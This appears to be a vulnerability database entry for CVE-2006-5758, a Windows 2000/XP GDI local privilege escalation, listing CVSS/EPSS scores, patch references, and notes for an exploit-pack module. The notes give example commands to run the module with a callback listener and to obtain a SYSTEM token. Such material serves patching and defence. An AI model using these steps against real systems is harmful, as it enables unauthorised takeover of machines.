7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.0005 Low
EPSS
Percentile
14.4%
Name | GDIWrite4 |
---|---|
CVE | CVE-2006-5758 Exploit Pack |
VENDOR: Microsoft | |
Notes: |
This exploit will auto-target based on reading a kernel file on Windows 2000
or XP. It will generate a target fingerprint when you run the auto-targeter -
this is useful when you don’t have read access to the kernel files and still want
to run the exploit. It will leave a SYSTEM token as your current token, if it succeeds
#example commandline usage on Windows 2000 SP4 English
#we set our callback IP to 10.10.10.6 in the test lab
runmodule GDIWrite4 -l 10.10.10.6 -d 5555
Make sure you have a listener listening already before you run the above
command.
./commandlineInterface -v 1 -p 5555
If you get the wrong version, (-v 1 on an XP box, say) you’ll see a PAGE FAULT
IN NON PAGED AREA bluescreen.
On XP this was fixed with KB925902
MSRC: http://www.microsoft.com/technet/security/Bulletin/ms07-017.mspx
MSADV: MS07-017
Date public: 11/06/2006
CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5758
CVSS: 7.2